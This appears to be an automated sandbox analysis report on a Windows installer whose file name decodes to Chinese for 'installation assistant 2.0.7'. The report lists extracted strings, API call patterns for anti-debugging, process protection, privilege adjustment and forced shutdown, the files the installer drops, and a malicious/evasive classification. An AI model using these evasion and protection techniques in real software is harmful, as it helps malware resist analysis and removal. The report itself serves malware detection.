Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000001.00000003.2075102858.0000000004240000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000001.00000003.2075102858.0000000004240000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000001.00000003.2075102858.0000000004240000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.drString found in binary or memory: http://ocsp.digicert.com0A
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000001.00000003.2075102858.0000000004240000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.drString found in binary or memory: http://ocsp.digicert.com0C
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000001.00000003.2075102858.0000000004240000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.drString found in binary or memory: http://ocsp.digicert.com0H
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000001.00000003.2075102858.0000000004240000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.drString found in binary or memory: http://ocsp.digicert.com0I
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000001.00000003.2075102858.0000000004240000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.drString found in binary or memory: http://ocsp.digicert.com0X
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000001.00000003.2075102858.0000000004240000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.drString found in binary or memory: http://www.digicert.com/CPS0
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000001.00000003.2075102858.0000000004240000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U52a9#U624b2.0.7.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U52a9#U624b2.0.7.exe, 00000000.00000003.2065280017.0000000002D50000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.exe, 00000000.00000003.2065641088.000000007ECFB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000001.00000000.2067287826.0000000000A21000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000006.00000000.2087886960.000000000117D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp.0.dr, #U5b89#U88c5#U52a9#U624b2.0.7.tmp.5.drString found in binary or memory: https://www.innosetup.com/
Source: #U5b89#U88c5#U52a9#U624b2.0.7.exe, 00000000.00000003.2065280017.0000000002D50000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.exe, 00000000.00000003.2065641088.000000007ECFB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000001.00000000.2067287826.0000000000A21000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000006.00000000.2087886960.000000000117D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp.0.dr, #U5b89#U88c5#U52a9#U624b2.0.7.tmp.5.drString found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

barindex
Protects its processes via BreakOnTermination flag
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess information set: 01 00 00 00 Jump to behavior

System Summary

barindex
PE file contains section with special chars
Source: update.vac.1.drStatic PE information: section name: .#.q
Source: hrsw.vbc.6.drStatic PE information: section name: .#.q
Source: update.vac.6.drStatic PE information: section name: .#.q
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6C9C5690 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle,6_2_6C9C5690
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6C843886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C843886
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6C843C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C843C62
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6C843D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C843D18
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6C843D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C843D62
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6C8439CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C8439CF
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6C9C62D0 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6C9C62D0
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6C843A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C843A6A
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6C841950: CreateFileA,DeviceIoControl,CloseHandle,6_2_6C841950
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6C844754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor,6_2_6C844754
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6C8447546_2_6C844754
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6C854A276_2_6C854A27
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6C9C1DF06_2_6C9C1DF0
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6C9C6FB36_2_6C9C6FB3
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA26CE06_2_6CA26CE0
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA94DE06_2_6CA94DE0
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA76D106_2_6CA76D10
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6C9F8EA16_2_6C9F8EA1
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA4AEEF6_2_6CA4AEEF
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA7EEF06_2_6CA7EEF0
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA12EC96_2_6CA12EC9
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA448966_2_6CA44896
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA8C8D06_2_6CA8C8D0
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA868206_2_6CA86820
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA6E8106_2_6CA6E810
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA948706_2_6CA94870
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA969996_2_6CA96999
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA8A9306_2_6CA8A930
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA769006_2_6CA76900
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA9A91A6_2_6CA9A91A
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6C9F89726_2_6C9F8972
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA889506_2_6CA88950
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA84AA06_2_6CA84AA0
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA9AA006_2_6CA9AA00
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA50A526_2_6CA50A52
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA6AB906_2_6CA6AB90
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA8EBC06_2_6CA8EBC0
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA00BCA6_2_6CA00BCA
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA10B666_2_6CA10B66
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA584AC6_2_6CA584AC
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA844896_2_6CA84489
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA7E4D06_2_6CA7E4D0
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA725806_2_6CA72580
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA7C5806_2_6CA7C580
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA745D06_2_6CA745D0
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA625216_2_6CA62521
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA885206_2_6CA88520
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA946C06_2_6CA946C0
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA8E6006_2_6CA8E600
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA867A06_2_6CA867A0
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6C9FC7CF6_2_6C9FC7CF
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA5C7F36_2_6CA5C7F3
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA967C06_2_6CA967C0
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA7E0E06_2_6CA7E0E0
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA700206_2_6CA70020
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA8C2A06_2_6CA8C2A0
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA882006_2_6CA88200
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA95D906_2_6CA95D90
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA47D436_2_6CA47D43
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA73D506_2_6CA73D50
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA79E806_2_6CA79E80
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA51F116_2_6CA51F11
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA6589F6_2_6CA6589F
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA878C86_2_6CA878C8
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA799F06_2_6CA799F0
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA71AA06_2_6CA71AA0
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA6DAD06_2_6CA6DAD0
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6CA86AF06_2_6CA86AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00DE81EC10_2_00DE81EC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E281C010_2_00E281C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E3824010_2_00E38240
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E1425010_2_00E14250
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E3C3C010_2_00E3C3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E304C810_2_00E304C8
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E1865010_2_00E18650
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00DF094310_2_00DF0943
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E1C95010_2_00E1C950
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E18C2010_2_00E18C20
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E34EA010_2_00E34EA0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E30E0010_2_00E30E00
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E010AC10_2_00E010AC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E2D08910_2_00E2D089
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E391C010_2_00E391C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E1D1D010_2_00E1D1D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E2518010_2_00E25180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E3112010_2_00E31120
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E3D2C010_2_00E3D2C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E053F310_2_00E053F3
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00DA53CF10_2_00DA53CF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E354D010_2_00E354D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00DED49610_2_00DED496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E3D47010_2_00E3D470
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00DA157210_2_00DA1572
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E3155010_2_00E31550
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E2D6A010_2_00E2D6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00DF965210_2_00DF9652
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00DA97CA10_2_00DA97CA
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00DB976610_2_00DB9766
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E3D9E010_2_00E3D9E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00DA1AA110_2_00DA1AA1
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E25E8010_2_00E25E80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E25F8010_2_00E25F80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00DBE00A10_2_00DBE00A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E222E010_2_00E222E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E4230010_2_00E42300
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E0E49F10_2_00E0E49F
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E225F010_2_00E225F0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E166D010_2_00E166D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E1A6A010_2_00E1A6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E3E99010_2_00E3E990
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E22A8010_2_00E22A80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00DFAB1110_2_00DFAB11
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E26CE010_2_00E26CE0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E270D010_2_00E270D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E1B18010_2_00E1B180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E0B12110_2_00E0B121
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E3720010_2_00E37200
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E3F3C010_2_00E3F3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00DCB3E410_2_00DCB3E4
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E2F3A010_2_00E2F3A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E2F42010_2_00E2F420
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E1741010_2_00E17410
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E3F59910_2_00E3F599
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E3353010_2_00E33530
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E1F50010_2_00E1F500
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E4351A10_2_00E4351A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E4360110_2_00E43601
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E377C010_2_00E377C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E1379010_2_00E13790
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00DCF8E010_2_00DCF8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E1F91010_2_00E1F910
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00DBBAC910_2_00DBBAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E27AF010_2_00E27AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00DF3AEF10_2_00DF3AEF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00DBBC9210_2_00DBBC92
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E27C5010_2_00E27C50
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E1FDF010_2_00E1FDF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess token adjusted: SecurityJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: String function: 6C9F9240 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: String function: 6CA96F10 appears 505 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00DA28E3 appears 34 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00DA1E40 appears 171 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00E3FB10 appears 723 times
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp.5.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b2.0.7.exeStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp.0.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp.5.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b2.0.7.exe, 00000000.00000003.2065280017.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNamem11feM2J5C.exe vs #U5b89#U88c5#U52a9#U624b2.0.7.exe
Source: #U5b89#U88c5#U52a9#U624b2.0.7.exe, 00000000.00000003.2065641088.000000007EFFA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNamem11feM2J5C.exe vs #U5b89#U88c5#U52a9#U624b2.0.7.exe
Source: #U5b89#U88c5#U52a9#U624b2.0.7.exe, 00000000.00000000.2063640399.0000000000219000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNamem11feM2J5C.exe vs #U5b89#U88c5#U52a9#U624b2.0.7.exe
Source: #U5b89#U88c5#U52a9#U624b2.0.7.exeBinary or memory string: OriginalFileNamem11feM2J5C.exe vs #U5b89#U88c5#U52a9#U624b2.0.7.exe
Source: #U5b89#U88c5#U52a9#U624b2.0.7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.12.drBinary string: \Device\TfSysMon
Source: tProtect.dll.12.drBinary string: \Device\TfKbMonPWLCache
Source: classification engineClassification label: mal88.evad.winEXE@125/33@0/0
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6C9C62D0 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6C9C62D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00DA9313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,10_2_00DA9313
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00DB3D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_00DB3D66
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00DA9252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,10_2_00DA9252
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6C9C57B0 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW,6_2_6C9C57B0
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpFile created: C:\Program Files (x86)\Windows NT\is-F0JVG.tmpJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6768:120:WilError_03
